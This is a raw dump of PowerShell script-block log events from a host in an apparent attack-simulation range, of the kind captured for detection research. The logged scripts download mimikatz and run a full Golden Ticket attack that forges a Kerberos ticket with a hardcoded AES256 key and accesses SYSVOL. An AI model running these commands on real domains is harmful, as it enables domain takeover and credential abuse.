4104152150x0105470Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
# code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
$domain = gwmi Win32_ComputerSystem | Select -Expand Domain
$krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
$domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
echo Purge existing tickets and create golden ticket:
klist purge
$env:TEMP\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit"
echo.
echo Requesting SYSVOL:
dir \\%userdnsdomain%\SYSVOL
echo.
echo Tickets after requesting SYSVOL:
klist
echo.
echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
Start-Sleep 1 # wait a bit so the output file has time to be created
Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
if ($_ -match 'End of Golden Ticket attack') { break }
}
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\golden.txt
# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore}e53865f4-d717-4a63-b23a-ea154769921a
4104152150x0105468Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore
# get current domain SID if default was used
$domain_sid = "S-1-5-21-DEFAULT"
If ($domain_sid -Match "DEFAULT") {
# code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60
$domain = gwmi Win32_ComputerSystem | Select -Expand Domain
$krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
$domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
}
# create batch file with commands to run in a separate "runas /netonly" session
# so we don't purge Kerberos ticket from the current Windows session
# its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise
@"
>%TEMP%\golden.txt 2>&1 (
echo Purge existing tickets and create golden ticket:
klist purge
$env:TEMP\mimikatz\x64\mimikatz.exe "kerberos::golden /domain:%userdnsdomain% /sid:DOMAIN_SID /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 /user:goldenticketfakeuser /ptt" "exit"
echo.
echo Requesting SYSVOL:
dir \\%userdnsdomain%\SYSVOL
echo.
echo Tickets after requesting SYSVOL:
klist
echo.
echo End of Golden Ticket attack
)
"@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat
# run batch file in a new empty session (password and username do not matter)
echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null
# wait until the output file has logged the entire attack
do {
Start-Sleep 1 # wait a bit so the output file has time to be created
Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object {
if ($_ -match 'End of Golden Ticket attack') { break }
}
} while ($false) # dummy loop so that 'break' can be used
# show output from new empty session
Get-Content $env:TEMP\golden.txt
# cleanup temp files
Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore
Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore}b63facc9-7b60-497f-8a91-1b9537972461
4104152150x0105130Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}891c78a5-23ca-4e25-8efb-9226a0a1ec48
4104152150x0105128Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}c3279d05-56e3-4db8-bdeb-4591f7aab25f
4104152150x0105061Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force}711dc896-3f4f-4968-a04e-a134b60f1753
4104152150x0105059Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force}83c5e779-3e42-498d-ba9a-e7a7c4074511
4104152150x0105048Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11{$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}aa106d5d-1658-4743-abd1-198b246cb07e
4104152150x0105046Microsoft-Windows-PowerShell/Operationalwin-dc-mhaag-attack-range-325.attackrange.local11& {$mimikatz_path = cmd /c echo $env:TEMP\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}}1a2db65e-0d5c-4b56-83a6-6a4073937309